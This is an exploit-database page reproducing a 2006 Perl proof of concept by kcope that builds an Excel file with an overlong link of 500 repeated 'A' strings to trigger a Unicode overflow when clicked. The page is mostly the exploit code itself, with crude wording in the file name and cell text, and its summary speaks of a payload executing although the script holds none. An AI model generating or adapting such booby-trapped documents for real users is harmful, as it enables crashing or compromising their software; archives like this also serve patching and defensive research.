header-logo
Suggest Exploit
vendor:
N/A
by:
kcope
7.5
CVSS
HIGH
Excel Unicode Overflow
119
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

excelsexywarez.pl

This exploit uses Spreadsheet::WriteExcel to create a malicious Excel file with a link containing 500 'A' characters. When the link is clicked, the malicious payload is executed.

Mitigation:

Disable macros in Excel, use a sandbox environment, and use antivirus software.
Source

Exploit-DB raw data:

###############################
# excelsexywarez.pl
# excel unicode overflow poc
# by kcope in 2006
# thanks to revoguard and alex
###############################
use Spreadsheet::WriteExcel;

   my $workbook = Spreadsheet::WriteExcel->new("FUCK.xls");

   $worksheet = $workbook->add_worksheet();

   $format = $workbook->add_format();
   $format->set_bold();
   $format->set_color('red');
   $format->set_align('center');

   $col = $row = 5;
   $worksheet->write($row, $col, "kcope in da house! Click on the link!!!", $format);

   $a="AAAAAAAAAAAAAAAAAAAAAA\\" x 500;
   $worksheet->write_url(0, 0, "$a", "LINK");

# milw0rm.com [2006-06-18]

Navigation

Suggest Exploit

Services By CQR